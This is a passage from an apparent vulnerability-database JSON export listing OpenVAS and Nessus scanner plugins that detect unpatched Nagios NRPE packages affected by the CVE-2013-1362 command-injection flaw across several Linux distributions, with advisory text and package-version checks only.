script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"Gentoo Linux Local Security Checks GLSA 201408-18\");\n script_copyright(\"Eero Volotinen\");\n script_family(\"Gentoo Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\n\nif((res=ispkgvuln(pkg:\"net-analyzer/nrpe\", unaffected: make_list(\"ge 2.15\"), vulnerable: make_list(\"lt 2.15\"))) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "nessus": [{"lastseen": "2019-02-21T01:19:10", "bulletinFamily": "scanner", "description": "Update to 2.14 upstream for security fix and misc other bugfixes.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "modified": "2018-12-05T00:00:00", "id": "FEDORA_2013-9848.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=67388", "published": "2013-07-12T00:00:00", "title": "Fedora 18 : nrpe-2.14-3.fc18 (2013-9848)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2013-9848.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(67388);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2018/12/05 20:31:21\");\n\n script_cve_id(\"CVE-2013-1362\");\n script_bugtraq_id(58142);\n script_xref(name:\"FEDORA\", value:\"2013-9848\");\n\n script_name(english:\"Fedora 18 : nrpe-2.14-3.fc18 (2013-9848)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Update to 2.14 upstream for security fix and misc other bugfixes.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=916947\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2013-June/108468.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?d49edbe2\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected nrpe package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Nagios Remote Plugin Executor Arbitrary Command Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:nrpe\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:18\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/06/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/07/12\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^18([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 18.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC18\", reference:\"nrpe-2.14-3.fc18\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"nrpe\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-02-21T01:18:53", "bulletinFamily": "scanner", "description": "The remote host is running a version of Nagios NRPE that contains a flaw that is triggered when input passed via '$()' is not properly sanitized before being used to execute plugins.\n\nAn unauthenticated, remote attacker could exploit this issue to execute arbitrary commands within the context of the vulnerable application.", "modified": "2018-07-16T00:00:00", "id": "NAGIOS_NRPE_2_14.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=66361", "published": "2013-05-09T00:00:00", "title": "Nagios NRPE nrpe.c Arbitrary Command Execution", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(66361);\n script_version(\"1.6\");\n script_cvs_date(\"Date: 2018/07/16 14:09:13\");\n\n script_cve_id(\"CVE-2013-1362\");\n script_bugtraq_id(58142);\n script_xref(name:\"EDB-ID\", value:\"24955\");\n\n script_name(english:\"Nagios NRPE nrpe.c Arbitrary Command Execution\");\n script_summary(english:\"Checks the version of the remote Nagios NRPE\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The monitoring service running on the remote host is affected by an\narbitrary command execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running a version of Nagios NRPE that contains a\nflaw that is triggered when input passed via '$()' is not properly\nsanitized before being used to execute plugins.\n\nAn unauthenticated, remote attacker could exploit this issue to\nexecute arbitrary commands within the context of the vulnerable\napplication.\");\n# http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?f72b1d9b\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to Nagios NRPE 2.14 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Nagios Remote Plugin Executor Arbitrary Command Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/02/21\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/12/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/05/09\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:nagios:nagios\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Misc.\");\n\n script_dependencies(\"nagios_nrpe_detect.nasl\");\n script_require_keys(\"Settings/ParanoidReport\");\n script_require_ports(\"Services/nrpe\");\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nport = get_service(svc:\"nrpe\", exit_on_fail:TRUE);\n\nappname = \"Nagios NRPE\";\n\nversion = get_kb_item_or_exit(\"nrpe/\" + port + \"/Version\");\nif (version == 'unknown') audit(AUDIT_SERVICE_VER_FAIL, appname, port);\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nfix = '2.14';\nif (\n version =~ \"^1\\.\" ||\n version =~ \"^2\\.[0-9]($|[^0-9])\" ||\n version =~ \"^2\\.1[0-3]($|[^0-9])\"\n)\n{\n if (report_verbosity > 0)\n {\n report =\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fix + '\\n';\n security_hole(port:port,extra:report);\n }\n else security_hole(port);\n exit(0);\n}\nelse audit(AUDIT_LISTEN_NOT_VULN, appname, port, version);\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-02-21T01:21:30", "bulletinFamily": "scanner", "description": "NRPE (the Nagios Remote Plug-In Executor) allows the passing of $() to plugins/scripts which, if run under bash, will execute that shell command under a subprocess and pass the output as a parameter to the called script. Using this, it is possible to get called scripts, such as check_http, to execute arbitrary commands under the uid that NRPE/nagios is running as (typically, 'nagios').\n\nWith this update NRPE will deny remote requests containing a bash command substitution.", "modified": "2018-11-10T00:00:00", "id": "OPENSUSE-2013-301.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=74957", "published": "2014-06-13T00:00:00", "title": "openSUSE Security Update : nagios-nrpe (openSUSE-SU-2013:0621-1)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2013-301.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(74957);\n script_version(\"1.2\");\n script_cvs_date(\"Date: 2018/11/10 11:50:01\");\n\n script_cve_id(\"CVE-2013-1362\");\n\n script_name(english:\"openSUSE Security Update : nagios-nrpe (openSUSE-SU-2013:0621-1)\");\n script_summary(english:\"Check for the openSUSE-2013-301 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"NRPE (the Nagios Remote Plug-In Executor) allows the passing of $() to\nplugins/scripts which, if run under bash, will execute that shell\ncommand under a subprocess and pass the output as a parameter to the\ncalled script. Using this, it is possible to get called scripts, such\nas check_http, to execute arbitrary commands under the uid that\nNRPE/nagios is running as (typically, 'nagios').\n\nWith this update NRPE will deny remote requests containing a bash\ncommand substitution.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=807241\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.opensuse.org/opensuse-updates/2013-04/msg00039.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected nagios-nrpe packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Nagios Remote Plugin Executor Arbitrary Command Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:nagios-nrpe\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:nagios-nrpe-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:nagios-nrpe-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:nagios-plugins-nrpe\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:nagios-plugins-nrpe-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:12.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:12.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/03/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE12\\.1|SUSE12\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"12.1 / 12.2\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE12.1\", reference:\"nagios-nrpe-2.12-27.7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"nagios-nrpe-debuginfo-2.12-27.7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"nagios-nrpe-debugsource-2.12-27.7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"nagios-plugins-nrpe-2.12-27.7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"nagios-plugins-nrpe-debuginfo-2.12-27.7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", reference:\"nagios-nrpe-2.12-30.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", reference:\"nagios-nrpe-debuginfo-2.12-30.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", reference:\"nagios-nrpe-debugsource-2.12-30.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", reference:\"nagios-plugins-nrpe-2.12-30.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", reference:\"nagios-plugins-nrpe-debuginfo-2.12-30.9.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"nagios-nrpe / nagios-nrpe-debuginfo / nagios-nrpe-debugsource / etc\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-02-21T01:19:10", "bulletinFamily": "scanner", "description": "Update to 2.14 upstream for security fix and misc other bugfixes.\nFixes a mistake in the service file which prevented the NRPE daemon from being started\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "modified": "2018-12-05T00:00:00", "id": "FEDORA_2013-9836.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=67387", "published": "2013-07-12T00:00:00", "title": "Fedora 17 : nrpe-2.14-3.fc17 (2013-9836)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2013-9836.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(67387);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2018/12/05 20:31:21\");\n\n script_cve_id(\"CVE-2013-1362\");\n script_bugtraq_id(58142);\n script_xref(name:\"FEDORA\", value:\"2013-9836\");\n\n script_name(english:\"Fedora 17 : nrpe-2.14-3.fc17 (2013-9836)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Update to 2.14 upstream for security fix and misc other bugfixes.\nFixes a mistake in the service file which prevented the NRPE daemon\nfrom being started\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=916947\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2013-June/108442.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?a42ed978\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected nrpe package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Nagios Remote Plugin Executor Arbitrary Command Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:nrpe\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:17\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/06/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/07/12\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^17([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 17.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC17\", reference:\"nrpe-2.14-3.fc17\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"nrpe\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-02-21T01:19:47", "bulletinFamily": "scanner", "description": "Nagios NRPE was updated to add more blacklisting to avoid shell injection via nagios request packets. (CVE-2013-1362)", "modified": "2013-10-25T00:00:00", "id": "SUSE_11_NAGIOS-NRPE-130710.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=68980", "published": "2013-07-19T00:00:00", "title": "SuSE 11.2 / 11.3 Security Update : nagios-nrpe, nagios-plugins-nrpe (SAT Patch Numbers 8032 / 8033)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from SuSE 11 update information. The text itself is\n# copyright (C) Novell, Inc.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(68980);\n script_version(\"$Revision: 1.2 $\");\n script_cvs_date(\"$Date: 2013/10/25 23:52:02 $\");\n\n script_cve_id(\"CVE-2013-1362\");\n\n script_name(english:\"SuSE 11.2 / 11.3 Security Update : nagios-nrpe, nagios-plugins-nrpe (SAT Patch Numbers 8032 / 8033)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 11 host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Nagios NRPE was updated to add more blacklisting to avoid shell\ninjection via nagios request packets. (CVE-2013-1362)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=807241\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-1362.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Apply SAT patch number 8032 / 8033 as appropriate.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Nagios Remote Plugin Executor Arbitrary Command Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:nagios-nrpe\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:nagios-nrpe-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:nagios-plugins-nrpe\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/07/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/07/19\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)11\") audit(AUDIT_OS_NOT, \"SuSE 11\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SuSE 11\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES11\", sp:2, reference:\"nagios-nrpe-2.12-24.4.8.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:2, reference:\"nagios-nrpe-doc-2.12-24.4.8.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:2, reference:\"nagios-plugins-nrpe-2.12-24.4.8.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:3, reference:\"nagios-nrpe-2.12-24.4.8.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:3, reference:\"nagios-nrpe-doc-2.12-24.4.8.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:3, reference:\"nagios-plugins-nrpe-2.12-24.4.8.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-02-21T01:19:59", "bulletinFamily": "scanner", "description": "Incomplete blacklist vulnerability in nrpc.c in Nagios Remote Plug-In Executor (NRPE) before 2.14 might allow remote attackers to execute arbitrary shell commands via '$()' shell metacharacters, which are processed by bash.", "modified": "2018-04-18T00:00:00", "id": "ALA_ALAS-2013-203.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=69761", "published": "2013-09-04T00:00:00", "title": "Amazon Linux AMI : nrpe (ALAS-2013-203)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux AMI Security Advisory ALAS-2013-203.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(69761);\n script_version(\"1.7\");\n script_cvs_date(\"Date: 2018/04/18 15:09:35\");\n\n script_cve_id(\"CVE-2013-1362\");\n script_xref(name:\"ALAS\", value:\"2013-203\");\n\n script_name(english:\"Amazon Linux AMI : nrpe (ALAS-2013-203)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Amazon Linux AMI host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Incomplete blacklist vulnerability in nrpc.c in Nagios Remote Plug-In\nExecutor (NRPE) before 2.14 might allow remote attackers to execute\narbitrary shell commands via '$()' shell metacharacters, which are\nprocessed by bash.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://alas.aws.amazon.com/ALAS-2013-203.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Run 'yum update nrpe' to update your system.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Nagios Remote Plugin Executor Arbitrary Command Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:nagios-plugins-nrpe\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:nrpe\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:nrpe-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/06/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/09/04\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n 